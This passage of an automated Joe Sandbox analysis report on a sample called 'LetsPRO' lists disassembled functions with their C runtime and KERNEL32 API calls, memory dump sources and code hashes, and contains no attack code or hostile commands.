                                        • API ID: CloseConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionHandleLastObjectPrioritySingleThreadThrowWait_memset
                                        • String ID:
                                        • API String ID: 1332095174-0
                                        • Opcode ID: 60ad1e5abe6504e69a1c1e7dae444d6bea9a08987802fd7c8d8bd57f4fc4a442
                                        • Instruction ID: 6efdb356e2be26bbd50ed377094fcd7540b236027f3cb8f47ede99a81645b795
                                        • Opcode Fuzzy Hash: 60ad1e5abe6504e69a1c1e7dae444d6bea9a08987802fd7c8d8bd57f4fc4a442
                                        • Instruction Fuzzy Hash: 5E419171604611AFC714CF24DC44E9ABBE8FF49768F104A2AF465D3AA0DB34E944CBC5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _fileno.MSVCR100(?,?,?,?,?,6C9130F1,?), ref: 6C90CE0D
                                        • _read.MSVCR100(00000000,?,?,?,?,6C9130F1,?), ref: 6C90CE14
                                        • _fileno.MSVCR100(?), ref: 6C90CE37
                                        • _fileno.MSVCR100(?), ref: 6C90CE47
                                        • _fileno.MSVCR100(?), ref: 6C90CE58
                                        • _fileno.MSVCR100(?,?), ref: 6C90CE68
                                        • _errno.MSVCR100(?,?,6C9130F1,?), ref: 6C92875C
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C9130F1,?), ref: 6C928767
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _fileno$_errno_invalid_parameter_noinfo_read
                                        • String ID:
                                        • API String ID: 2022966298-0
                                        • Opcode ID: 571609bf9e75ebaa1040fe8f3cd9cc6ec0e1efa56dd421e26dafd731a373bf36
                                        • Instruction ID: 40b60dc23da0b1d95b26ca5139ec9bd0c938c466047b94594898f99c85614dd5
                                        • Opcode Fuzzy Hash: 571609bf9e75ebaa1040fe8f3cd9cc6ec0e1efa56dd421e26dafd731a373bf36
                                        • Instruction Fuzzy Hash: B3314832119B008ED3205F25C405B9B77E8EF2372CF308A1DD8F696E90DB34E5558B95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(?,?,6C9042D5,?), ref: 6C9287AA
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C9042D5,?), ref: 6C9287B5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2959964966-0
                                        • Opcode ID: 6685edf244d787a1540bee02662a68c3ee5c83281d612d2bd0cc7718606ad360
                                        • Instruction ID: dcf58730416946763f639730988b39ac22f4ff02b0020fefb50df861d66be91d
                                        • Opcode Fuzzy Hash: 6685edf244d787a1540bee02662a68c3ee5c83281d612d2bd0cc7718606ad360
                                        • Instruction Fuzzy Hash: C631F733565B018ED3244F29D840B9A77A8EF6373CB248A1ED4F586ED4DB3CE1418B88
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002,?,?,00000000,?,?,?,6C916D8C,?,?,6C916DA8,00000010), ref: 6C916E2E
                                        • _get_osfhandle.MSVCR100(?,00000000,?,?,?,6C916D8C,?,?,6C916DA8,00000010), ref: 6C916E38
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,6C916D8C,?,?,6C916DA8,00000010), ref: 6C916E3F
                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,6C916D8C,?,?,6C916DA8,00000010), ref: 6C916E46
                                          • Part of subcall function 6C90A6FA: _get_osfhandle.MSVCR100(?,?,?,?,6C90A7D5,?,6C90A7F0,00000010), ref: 6C90A705
                                          • Part of subcall function 6C90A6FA: _get_osfhandle.MSVCR100(?), ref: 6C90A728
                                          • Part of subcall function 6C90A6FA: CloseHandle.KERNEL32(00000000), ref: 6C90A72F
                                        • _errno.MSVCR100(?,00000000,?,?,?,6C916D8C,?,?,6C916DA8,00000010), ref: 6C9305A0
                                        • __doserrno.MSVCR100(?,00000000,?,?,?,6C916D8C,?,?,6C916DA8,00000010), ref: 6C9305AB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _get_osfhandle$CurrentHandleProcess$CloseDuplicate__doserrno_errno
                                        • String ID:
                                        • API String ID: 4219055303-0
                                        • Opcode ID: e9ccfb456a1a92393b461cce06e517b8ef4ff19647a23e0287bca4944f1010e5
                                        • Instruction ID: bf4beae7478b2709339e3b65e86c9c472fecc5135795c0e08de1c1fcb0934496
                                        • Opcode Fuzzy Hash: e9ccfb456a1a92393b461cce06e517b8ef4ff19647a23e0287bca4944f1010e5
                                        • Instruction Fuzzy Hash: D4312935618685AFDB01CF78C884F953BF5EF1A318F115299E814CFAA1DB71E944CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __crtCompareStringW.MSVCR100(?,00001001,00000000,?,?,?,?), ref: 6C915FFC
                                        • _errno.MSVCR100 ref: 6C92C79B
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92C7A6
                                        • _errno.MSVCR100 ref: 6C92C7B5
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92C7C0
                                        • _errno.MSVCR100 ref: 6C92C7CF
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92C7DA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$CompareString__crt
                                        • String ID:
                                        • API String ID: 380063240-0
                                        • Opcode ID: 717027d97cf7a6e3c3fd8312fa96299b366608f9cd107c798850030c7963a2ce
                                        • Instruction ID: 239e3ca305e363b08dc0c2ac9ce05dbafb80d881835bb97892d4086eb5424a4f
                                        • Opcode Fuzzy Hash: 717027d97cf7a6e3c3fd8312fa96299b366608f9cd107c798850030c7963a2ce
                                        • Instruction Fuzzy Hash: 9A315A3160518DDBEB106E68C8857BE36ECBF22728F201252E4F0DBED5DB36C85083A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _mbschr.MSVCR100(00000000,0000003D,00000000,00000000,7591DFF0), ref: 6C91214B
                                          • Part of subcall function 6C91210D: _mbschr_l.MSVCR100(00000000,00000000,00000000,?,6C912150,00000000,0000003D,00000000,00000000,7591DFF0), ref: 6C91211A
                                        • free.MSVCR100(?,?,?,?,?,?,?,?,?), ref: 6C9121B2
                                        • _errno.MSVCR100(00000000,00000000,7591DFF0), ref: 6C9121C4
                                        • _errno.MSVCR100(7591DFF0), ref: 6C931BEB
                                        • _invalid_parameter_noinfo.MSVCR100(7591DFF0), ref: 6C931BF6
                                        • ___wtomb_environ.LIBCMT ref: 6C931C1F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$___wtomb_environ_invalid_parameter_noinfo_mbschr_mbschr_lfree
                                        • String ID:
                                        • API String ID: 679965329-0
                                        • Opcode ID: 983e1ddac5669da851287938f34457817b31a93ff1579b0200b6f2f3b5e6cead
                                        • Instruction ID: b1d460a3dd20efd40bf770ca8dafff94bea5b4836f73997663497feab8a31672
                                        • Opcode Fuzzy Hash: 983e1ddac5669da851287938f34457817b31a93ff1579b0200b6f2f3b5e6cead
                                        • Instruction Fuzzy Hash: 9E31B276A4D659AFCB10EFE898C549C77B4EB53328B31157AD224A7E60DB30C6408FA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _getptd.MSVCR100(?,?,?,?,?,?,?,6C9050C8,00000014), ref: 6C904FB7
                                          • Part of subcall function 6C905298: _getptd.MSVCR100(6C9052F8,0000000C,6C92A025,?,?,6C9043EA,?), ref: 6C9052A4
                                          • Part of subcall function 6C905298: _lock.MSVCR100(0000000C), ref: 6C9052BB
                                        • _calloc_crt.MSVCR100(000000D8,00000001), ref: 6C904FD7
                                        • _lock.MSVCR100(0000000C), ref: 6C904FED
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • __copytlocinfo_nolock.LIBCMT ref: 6C904FFB
                                          • Part of subcall function 6C904D82: _unlock.MSVCR100(0000000C,6C905009), ref: 6C904D84
                                          • Part of subcall function 6C9051E2: __expandlocale.LIBCMT ref: 6C90523C
                                          • Part of subcall function 6C9051E2: strcmp.MSVCR100(?,00000048,?,?,?,00000001,00000000,00000000), ref: 6C905258
                                        • strcmp.MSVCR100(00000000,6C9A4BC0), ref: 6C905030
                                        • _lock.MSVCR100(0000000C), ref: 6C905041
                                        • _errno.MSVCR100(?,?,?,?,?,?,?,6C9050C8,00000014), ref: 6C930D00
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,6C9050C8,00000014), ref: 6C930D0B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _lock$_getptdstrcmp$CriticalEnterSection__copytlocinfo_nolock__expandlocale_calloc_crt_errno_invalid_parameter_noinfo_unlock
                                        • String ID:
                                        • API String ID: 2630553387-0
                                        • Opcode ID: 6f79c5030e388af4f4da63fc4d2a4451b03abf79fc1b11cb0c9bc4580f8dfbff
                                        • Instruction ID: e4dc80a3f39d5bf779fec60bcfaff69223a3e35021f371eb8bfee48152c4f2c5
                                        • Opcode Fuzzy Hash: 6f79c5030e388af4f4da63fc4d2a4451b03abf79fc1b11cb0c9bc4580f8dfbff
                                        • Instruction Fuzzy Hash: F631BC31B08744DBEB009FA8A844BDD77F4AF65328F20902DE42AA7B91CF74D5488E59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 6C90AD9E: _lock.MSVCR100(0000000B,6C90AE08,00000018,6C9773E0,00000000,00000000,00000000), ref: 6C90ADC5
                                        • _errno.MSVCR100(6C97A2F8,00000018,6C97A3A7,?,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A1ED
                                        • __doserrno.MSVCR100(6C97A2F8,00000018,6C97A3A7,?,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A1F8
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002,6C97A2F8,00000018,6C97A3A7,?,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A21A
                                        • _get_osfhandle.MSVCR100(?,00000000,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A220
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A227
                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A22A
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A234
                                        • __dosmaperr.LIBCMT(00000000,?,?,?,?,?,?,6C97A3E8,00000010), ref: 6C97A250
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentProcess$DuplicateErrorHandleLast__doserrno__dosmaperr_errno_get_osfhandle_lock
                                        • String ID:
                                        • API String ID: 1055742366-0
                                        • Opcode ID: 45f5bd7e4e83edb90454c13e59a684ac87dbecba84878eeec72647c7506a91bd
                                        • Instruction ID: 77ac7106091d38f5c770db13a14fe4466aac80fc8440eef3063613919fc5d6cc
                                        • Opcode Fuzzy Hash: 45f5bd7e4e83edb90454c13e59a684ac87dbecba84878eeec72647c7506a91bd
                                        • Instruction Fuzzy Hash: 8731C4326056958FDB11CFB4C850ADD7BB1AFAA319F141288D460AF691DF32D945CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _mbsrchr.MSVCR100(6C9A83F4,0000002E,6C9A83F4,00000012), ref: 6C956A37
                                          • Part of subcall function 6C9616C3: __mbsrchr_l.LIBCMT(00000400,6C94F416,00000000,?,6C94EFCD,6C94F416,0000002E,?,?,?,6C94F416,00000400,?), ref: 6C9616D0
                                        • _invalid_parameter_noinfo.MSVCR100(6C9A83F4,00000012), ref: 6C956A4E
                                        • strtoul.MSVCR100(00000001,00000000,00000020,00000000,6C9A83F4,00000012), ref: 6C956A5F
                                        • __ultoa_s.LIBCMT(?,?,00000008,00000020,00000000,6C9A83F4,00000012), ref: 6C956A88
                                        • strcpy_s.MSVCR100(00000001,00000000,?,?,?,?,?,00000000,6C9A83F4,00000012), ref: 6C956A9F
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,6C9A83F4,00000012), ref: 6C956AB0
                                        • _errno.MSVCR100(6C956BF8,00000010,6C956C4A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6C956AC7
                                        • _errno.MSVCR100(6C956BF8,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,6C9A83F4,00000012), ref: 6C956AE2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$__invoke_watson__mbsrchr_l__ultoa_s_invalid_parameter_noinfo_mbsrchrstrcpy_sstrtoul
                                        • String ID:
                                        • API String ID: 2319564628-0
                                        • Opcode ID: 127325d2b623add723334d97cc8f91de93522161ce67f5f27b6d2dd76838789e
                                        • Instruction ID: 930288001358d0db3149f2f567104d6f641823b8f0890c46ec21fdfe41a2f3ea
                                        • Opcode Fuzzy Hash: 127325d2b623add723334d97cc8f91de93522161ce67f5f27b6d2dd76838789e
                                        • Instruction Fuzzy Hash: 60210735B40208AEE700DF798C85AEE7778FF65718F504169E924D7B80EF70D919C650
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • wcsrchr.MSVCR100(6C9A8448,0000002E,6C9A8448,00000012,00000000), ref: 6C958706
                                        • _invalid_parameter_noinfo.MSVCR100(6C9A8448,00000012,00000000), ref: 6C958721
                                        • _wcstoul.LIBCMT(00000002,00000000,00000020,6C9A8448,00000012,00000000), ref: 6C95873D
                                        • __ultoa_s.LIBCMT(?,?,00000008,00000020,6C9A8448,00000012,00000000), ref: 6C958754
                                        • wcscpy_s.MSVCR100(00000002,00000000,?,?,?,?,?,6C9A8448,00000012,00000000), ref: 6C958768
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,6C9A8448,00000012,00000000), ref: 6C95877B
                                        • _errno.MSVCR100(6C9588C8,00000010,6C95891A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6C958792
                                        • _errno.MSVCR100(6C9588C8,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,6C9A8448,00000012,00000000), ref: 6C9587AD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$__invoke_watson__ultoa_s_invalid_parameter_noinfo_wcstoulwcscpy_swcsrchr
                                        • String ID:
                                        • API String ID: 1668553054-0
                                        • Opcode ID: 677f722872c573a618f78ab8ed9b30f5b64db88792c4a96fb1d3b084492ab2c0
                                        • Instruction ID: 67a0ed98884841befd074d9a4aa99054bf34651540ed48be71024173e3e35df0
                                        • Opcode Fuzzy Hash: 677f722872c573a618f78ab8ed9b30f5b64db88792c4a96fb1d3b084492ab2c0
                                        • Instruction Fuzzy Hash: B3210771B40704AEEB04DF798C8ABEE73A8EF64718F50052DE51097A81EB70E9088765
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C93FF00
                                        • ??3@YAXPAX@Z.MSVCR100(?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FF26
                                        • ??3@YAXPAX@Z.MSVCR100(00000000), ref: 6C93FF70
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FF84
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FF8C
                                        • TlsFree.KERNEL32(?,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FF96
                                        • ??3@YAXPAX@Z.MSVCR100(00000000,00000004,00000008,00000060,6C944BAC,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FFF0
                                          • Part of subcall function 6C9437A1: InterlockedFlushSList.KERNEL32(?,?,6C93FF23,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C9437AB
                                          • Part of subcall function 6C9437A1: InterlockedFlushSList.KERNEL32(?,?,6C93FF23,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C9437B6
                                          • Part of subcall function 6C9437A1: ??_V@YAXPAX@Z.MSVCR100(?,00000000,?,6C93FF23,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C9437EE
                                          • Part of subcall function 6C9437A1: ??3@YAXPAX@Z.MSVCR100(?,?,00000000,?,6C93FF23,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C9437F4
                                          • Part of subcall function 6C9437A1: ??_V@YAXPAX@Z.MSVCR100(?,?,6C93FF23,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C943805
                                        • InterlockedPopEntrySList.KERNEL32(6C9A55D0,6C9A55DC,?,?,?,?,00000008,6C93FEC4,00000004,6C93FE8D), ref: 6C93FFF7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ??3@$InterlockedList$Flush$EntryFreeH_prolog3
                                        • String ID:
                                        • API String ID: 270503109-0
                                        • Opcode ID: 35e13a2725b7725c2474ccf378d11eeca2f6ab76a0ca59f18738a6dc5dae309b
                                        • Instruction ID: fb62f06284977fb771016620d5db41cb47fc212821bc4c2b53592036a76edcb6
                                        • Opcode Fuzzy Hash: 35e13a2725b7725c2474ccf378d11eeca2f6ab76a0ca59f18738a6dc5dae309b
                                        • Instruction Fuzzy Hash: FE31C2716007129FDB00DFA4C880B59B7B4FF26318F145259E9146BB92CB70E925CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wcslen.LIBCMT(00000000,?,00000000,6C9308D0,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C912424
                                        • _calloc_crt.MSVCR100(00000001,00000004,?,?,00000000,6C9308D0,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C912435
                                        • _wcslen.LIBCMT(00000000,?,?,00000000,6C9308D0,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C912459
                                        • _calloc_crt.MSVCR100(00000001,00000002,?,?,00000000,6C9308D0,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C91246B
                                        • wcscpy_s.MSVCR100(00000000,00000001,00000000,?,?,00000000,6C9308D0,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C91247F
                                        • free.MSVCR100(?,?,00000000,6C9308D0,?,00000000,?,6C910D07,?,6C910D28,0000000C), ref: 6C91249D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _calloc_crt_wcslen$freewcscpy_s
                                        • String ID:
                                        • API String ID: 968141106-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _strlen.LIBCMT(00000000,?,?,6C90B952), ref: 6C90B991
                                        • _calloc_crt.MSVCR100(00000001,00000004,?,?,6C90B952), ref: 6C90B9A1
                                        • _strlen.LIBCMT(00000000,?,?,?,6C90B952), ref: 6C90B9C8
                                        • _calloc_crt.MSVCR100(00000001,00000001,?,?,?,6C90B952), ref: 6C90B9D9
                                        • strcpy_s.MSVCR100(00000000,00000001,00000000,?,?,?,6C90B952), ref: 6C90B9ED
                                        • free.MSVCR100(?,?,?,6C90B952), ref: 6C90BA0A
                                        Similarity
                                        • API ID: _calloc_crt_strlen$freestrcpy_s
                                        • String ID:
                                        • API String ID: 1972913904-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __doserrno.MSVCR100(6C916DA8,00000010), ref: 6C916CF9
                                        • __doserrno.MSVCR100(6C916DA8,00000010), ref: 6C9305DC
                                        • _errno.MSVCR100(6C916DA8,00000010), ref: 6C9305E4
                                        • _errno.MSVCR100(6C916DA8,00000010), ref: 6C9305F9
                                        • _invalid_parameter_noinfo.MSVCR100(6C916DA8,00000010), ref: 6C930604
                                        • __doserrno.MSVCR100(6C916DA8,00000010), ref: 6C93060B
                                        • _extend_ioinfo_arrays.LIBCMT ref: 6C930614
                                        • _errno.MSVCR100(6C916DA8,00000010), ref: 6C930621
                                        Similarity
                                        • API ID: __doserrno_errno$_extend_ioinfo_arrays_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3030660385-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • DecodePointer.KERNEL32(?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120,?,6C90B961), ref: 6C90AA91
                                        • DecodePointer.KERNEL32(?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120,?,6C90B961), ref: 6C90AA9E
                                        • _msize.MSVCR100(00000000,?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120), ref: 6C90AABB
                                          • Part of subcall function 6C90260A: HeapSize.KERNEL32(00000000,00000000,?,6C90AAC0,00000000,?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?), ref: 6C902624
                                        • EncodePointer.KERNEL32(?,?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120), ref: 6C90AAD7
                                        • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120), ref: 6C90AADF
                                        • _realloc_crt.MSVCR100(00000000,00000800,?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120), ref: 6C912804
                                        • EncodePointer.KERNEL32(00000000,?,?,?,?,?,6C90AA43,?,6C90AA60,0000000C,6C90C5A1,?,?,6C90C4A5,6C927120), ref: 6C91281A
                                        Similarity
                                        • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                        • String ID:
                                        • API String ID: 765448609-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(?,?,6C9769BE,?,?), ref: 6C976B13
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C9769BE,?,?), ref: 6C976B1E
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
